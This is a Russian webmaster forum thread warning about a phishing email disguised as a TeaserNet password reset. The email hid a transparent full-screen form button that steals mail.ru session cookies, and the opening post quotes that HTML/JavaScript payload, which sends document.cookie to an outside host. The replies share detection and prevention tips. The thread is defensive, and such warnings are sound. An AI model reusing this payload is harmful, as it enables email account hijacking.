Опасные письма, ворующие cookies

123 4
Snake800
На сайте с 02.02.2011
Offline
215
5103

Не знаю, в каком разделе запостить, но хочу предупредить уважаемое сообщество от вероятного угона почтовых ящиков мыл@(?).

Словил на @мыло письмо следующего содержания:


From: "teasernet.com" <no-reply TeaserNet.com>
Subject: Новый пароль

Здравствуйте,
Ваш новый пароль ... бла-бла-бла ... - администрация.

В Тизернете регистрировался очень давно, да и не на этот e-mail. Восстановление пароля тоже не запрашивал, но прочитать письмо зашёл, чего это они... Поняв, что письмо не представляет собой интереса, кликнул по ссылке назад ко входящим и тут опаньки - ссылка не туда и понял, что "я сболтнул чего-то лишнего".

Смысл следующий: письмо содержит форму с прозрачной кнопкой на весь экран, при клике на которую по замыслу злоумышленника стартует ява-скрипт, грузящий картинку с get-параметрами куков текущего документа. Т.е. нашего мыла.

<form target="_self" action="javascript:delf=document.getElementById('delf');delf.style.display='none';img=new Image();img.src="http://x-...s.ru/cor/s.php?"+document.cookie;" formtarget="_self">
<input id="delf" type=submit value="" style="filter:alpha(opacity=0);-moz-opacity:0;opacity:0;***x70;osition:absolute;z-index:9999999999999;margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">
</form>

Как заметить неладное: курсор мыши не меняет свой вид на "палец" при подведении к ссылкам. Если всё-таки кликнули и видите, что попали не туда куда планировали - сразу меняйте пароль. Ну и https + запрет параллельных сессий - так секьюрнее. Пишу здесь, потому что похоже я не одинок - подобный случай 2 дня назад.

И да, вероятнее всего, уважаемый TeaserNet к этому не имеет никакого отношения, просто хайджэкинг идёт от его имени. От имени отправителя может выступать кто угодно, будьте внимательны, леди и джентльмены.

Неадекватный
На сайте с 12.07.2012
Offline
12
#1

Фигасе! А разве скрипты разрешены в просмотре письма?

Какой сервис?

B
На сайте с 02.05.2007
Offline
240
#2

сервис зебат, видимо, или еще какой подобный

xpycteamset
На сайте с 05.10.2009
Offline
129
#3

Такое же письмо пришло от Гогетлинкса но пароль не запрашивал, да и не входил в него давненько, и лишних кнопок не обнаружил. может ящик от mail порезал данную кнопку?

Snake800
На сайте с 02.02.2011
Offline
215
#4
Неадекватный:
Фигасе! А разве скрипты разрешены в просмотре письма?
Какой сервис?

Сервис mail.ru, web-интерфейс. Скрипты походу он блокировал, или сработали они не так как ожидалось. Т.к. часть скрипта до параметров ушла в адресную строку, а содержимое куков вывелось на экране. Проверять второй раз не рискнул.

WEB-мастер
На сайте с 23.07.2009
Offline
174
#5

Некоторое время назад было подобное письмо.

Сменил сейчас пароль, проверил наличие доменов)

Лучший парсер ( https://goo.gl/aw7tPJ ) чего угодно.
Snake800
На сайте с 02.02.2011
Offline
215
#6

с другой стороны, раз содержимое куков всё-таки высветилось, значит не так уж он и запрещает javascript, имхо.

xpycteamset, ГГЛ если не ошибаюсь, в целях безопасности на днях массово сменил пароли.

xpycteamset
На сайте с 05.10.2009
Offline
129
#7
Snake800:
на днях массово сменил пароли

Не скажу что на днях но письмо получил 14 августа только из-за этого топика решил его открыть.

SeVlad
На сайте с 03.11.2008
Offline
1609
#8

Уж сколько раз твердили миру - не юзайте почтовые вэбфейсы (и не разрешайте хтмл в клиентах).

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
A6
На сайте с 21.09.2011
Offline
22
#9

Код сработал не полностью, основная идея это получить ваш пароль путем фишинга(выскакивает форма ввода пароля), код не сработал как планировали "злоумышленники"..

Очень часто раньше получал подобные письма: /ru/forum/714038

Robinzonchik
На сайте с 14.07.2010
Offline
55
#10

Вывод:

Не пользуйтесь mail.ru.

Gmail + десктоп клиент

Я никогда не любил mail.ru, но возненавидеть их заставил спутник...

Пишу программы, сайты, сервисы, скрипты. (/ru/forum/819250)
123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий